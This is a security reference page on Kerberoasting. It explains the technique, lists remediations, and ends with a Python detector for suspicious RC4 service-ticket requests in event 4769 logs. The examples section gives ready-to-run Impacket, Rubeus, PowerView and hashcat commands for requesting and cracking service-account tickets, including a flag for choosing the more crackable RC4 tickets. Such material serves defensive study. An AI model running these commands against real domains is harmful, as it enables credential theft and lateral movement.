Kerberoasting
Description
Kerberoasting targets service accounts by requesting Kerberos service tickets (TGS) that are encrypted with the service account's key (derived from its password). Any authenticated domain user can request these tickets, capture them and crack them offline to recover the underlying password. Because many service accounts are long‑lived, run with elevated privileges, and have weak passwords, Kerberoasting remains a high‑impact, low‑noise attack path. Tickets encrypted with RC4‑HMAC (whose key is the account's NT hash) are especially susceptible to cracking.
Examples
Requesting Crackable Service Tickets (Impacket)
Enumerate SPNs and request TGS tickets for offline cracking:
GetUserSPNs.py corp.local/user:Passw0rd! -dc-ip 10.0.0.10 -request -output kerberoast_hashes.txt
This writes $krb5tgs$ hashes suitable for cracking.
You can also list SPNs using native tools:
setspn -Q */*
# Or PowerView
Get-DomainUser -SPN | Select SamAccountName,ServicePrincipalName
Requesting and Injecting with Rubeus
From a domain-joined host, request tickets and save for cracking:
Rubeus kerberoast /nowrap /outfile:kerberoast_hashes.txt
Crack the hashes with hashcat (mode 13100 for Kerberos 5 TGS-REP RC4-HMAC):
hashcat -m 13100 kerberoast_hashes.txt rockyou.txt --username
Recovered passwords demonstrate weak service account hygiene and enable lateral movement.
Targeting specific encryption types
Prefer requesting RC4 tickets (if enabled) because they are more crackable:
Rubeus kerberoast /nowrap /rc4opsec
Remediation
- Move services to managed identities
  - Use gMSA/MSA with automatically rotated, long random passwords.
  - Remove interactive logon and reduce group memberships for service principals.
- Enforce strong crypto and password quality
  - Prefer AES‑only for Kerberos; disable RC4 where possible (domain functional level permitting).
  - Set long, random passwords on legacy service accounts and rotate regularly.
- Minimise and review SPNs
  - Remove stale SPNs and avoid over‑privileged service accounts (never Domain Admin).
  - Monitor 4769 for unusual TGS requests and RC4 usage; alert on spikes and rare requesters.
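The 4769 monitoring point above, as an added detection example that is not part of the original page: it flags a requester that obtains RC4-encrypted (TicketEncryptionType 0x17/0x18) service tickets for several distinct user SPNs in a short window, ignoring computer accounts and krbtgt. The sample records are constructed in a flattened key=value layout, not real exported log lines; the window and threshold are assumed tuning values.

```python
from collections import defaultdict
from datetime import datetime, timedelta

# Constructed sample 4769 records in a flattened key=value form (not real exported log lines).
SAMPLE_4769 = """\
2024-05-01T09:00:01Z EventID=4769 TargetUserName=alice@CORP.LOCAL ServiceName=sqlsvc TicketEncryptionType=0x17 IpAddress=10.0.0.55 Status=0x0
2024-05-01T09:00:02Z EventID=4769 TargetUserName=alice@CORP.LOCAL ServiceName=websvc TicketEncryptionType=0x17 IpAddress=10.0.0.55 Status=0x0
2024-05-01T09:00:03Z EventID=4769 TargetUserName=alice@CORP.LOCAL ServiceName=backupsvc TicketEncryptionType=0x17 IpAddress=10.0.0.55 Status=0x0
2024-05-01T09:00:04Z EventID=4769 TargetUserName=alice@CORP.LOCAL ServiceName=WS01$ TicketEncryptionType=0x17 IpAddress=10.0.0.55 Status=0x0
2024-05-01T09:10:00Z EventID=4769 TargetUserName=bob@CORP.LOCAL ServiceName=sqlsvc TicketEncryptionType=0x12 IpAddress=10.0.0.77 Status=0x0
2024-05-01T09:11:00Z EventID=4769 TargetUserName=bob@CORP.LOCAL ServiceName=krbtgt TicketEncryptionType=0x12 IpAddress=10.0.0.77 Status=0x0
"""

RC4_ETYPES = {"0x17", "0x18"}  # RC4-HMAC and RC4-HMAC-EXP; 0x11/0x12 are AES

def parse_4769(text):
    """Parse the constructed key=value records into dicts; keep only successful 4769 events."""
    events = []
    for line in text.splitlines():
        ts, _, rest = line.strip().partition(" ")
        if not rest:
            continue
        fields = dict(kv.split("=", 1) for kv in rest.split())
        if fields.get("EventID") != "4769" or fields.get("Status") != "0x0":
            continue
        fields["ts"] = datetime.strptime(ts, "%Y-%m-%dT%H:%M:%SZ")
        events.append(fields)
    return events

def is_roastable_target(service):
    """Computer accounts (trailing $) and krbtgt are not Kerberoast targets; skip them."""
    return not service.endswith("$") and service.lower() != "krbtgt"

def kerberoast_alerts(events, window=timedelta(minutes=5), min_services=3):
    """Return {requester: [SPNs]} for users pulling RC4 TGS for >= min_services SPNs within window."""
    per_user = defaultdict(list)
    for e in events:
        if e.get("TicketEncryptionType") in RC4_ETYPES and is_roastable_target(e["ServiceName"]):
            per_user[e["TargetUserName"]].append((e["ts"], e["ServiceName"]))
    alerts = {}
    for user, reqs in per_user.items():
        reqs.sort()  # sliding window over requests ordered by timestamp
        for i, (start, _) in enumerate(reqs):
            in_window = {svc for ts, svc in reqs[i:] if ts - start <= window}
            if len(in_window) >= min_services:
                alerts[user] = sorted(in_window)
                break
    return alerts
```

In an AES-only domain, any 0x17 ticket is itself worth an alert; the distinct-SPN threshold matters most where RC4 is still permitted.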